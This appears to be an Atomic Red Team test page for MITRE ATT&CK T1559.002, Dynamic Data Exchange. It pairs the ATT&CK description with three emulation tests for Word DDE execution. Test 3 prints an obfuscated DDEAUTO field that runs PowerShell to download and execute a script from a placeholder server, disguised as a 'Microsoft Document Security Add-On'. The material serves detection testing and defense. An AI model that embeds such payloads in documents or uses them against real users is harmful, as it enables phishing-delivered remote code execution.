T1559.002
Inter-Process Communication: Dynamic Data Exchange
Description from ATT&CK
Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.
Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by Component Object Model, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.(Citation: BleepingComputer DDE Disabled in Word Dec 2017)(Citation: Microsoft ADV170021 Dec 2017)(Citation: Microsoft DDE Advisory Nov 2017)
Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via Phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.(Citation: SensePost PS DDE May 2016)(Citation: Kettle CSV DDE Aug 2014)(Citation: Enigma Reviving DDE Jan 2018)(Citation: SensePost MacroLess DDE Oct 2017) Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program.(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection )
DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a Command and Scripting Interpreter. DDE execution can be invoked remotely via Remote Services such as Distributed Component Object Model (DCOM).(Citation: Fireeye Hunting COM June 2019)
Atomic Tests
Atomic Test #1 - Execute Commands
Executes commands via DDE using Microsfot Word
Supported Platforms: windows
auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd
Inputs:
None
Run it with these steps! Open Microsoft Word
Insert tab -> Quick Parts -> Field
Choose = (Formula) and click ok.
After that, you should see a Field inserted in the document with an error "!Unexpected End of Formula", right-click the Field, and choose Toggle Field Codes.
The Field Code should now be displayed, change it to Contain the following:
{DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe" }
1
Atomic Test #2 - Execute PowerShell script via Word DDE
When the word document opens it will prompt the user to click ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script
Supported Platforms: windows
auto_generated_guid: 47c21fb6-085e-4b0d-b4d2-26d72c3830b3
Inputs:
None
Attack Commands: Run with command_prompt!
1
2
start $PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx
Atomic Test #3 - DDEAUTO
TrustedSec - Unicorn - https://github.com/trustedsec/unicorn
SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
Word VBA Macro
Supported Platforms: windows
auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181
Inputs:
None
Run it with these steps!
-
Open Word
-
Insert tab -> Quick Parts -> Field
-
Choose = (Formula) and click ok.
-
Once the field is inserted, you should now see "!Unexpected End of Formula"
-
Right-click the Field, choose "Toggle Field Codes"
-
Paste in the code from Unicorn or SensePost
-
Save the Word document.
-
DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe"
-
DDEAUTO "C:\Programs\Microsoft\Office\MSWord\..\..\..\..\windows\system32\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\v1.0\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString('http://<server>/download.ps1'); # " "Microsoft Document Security Add-On"
1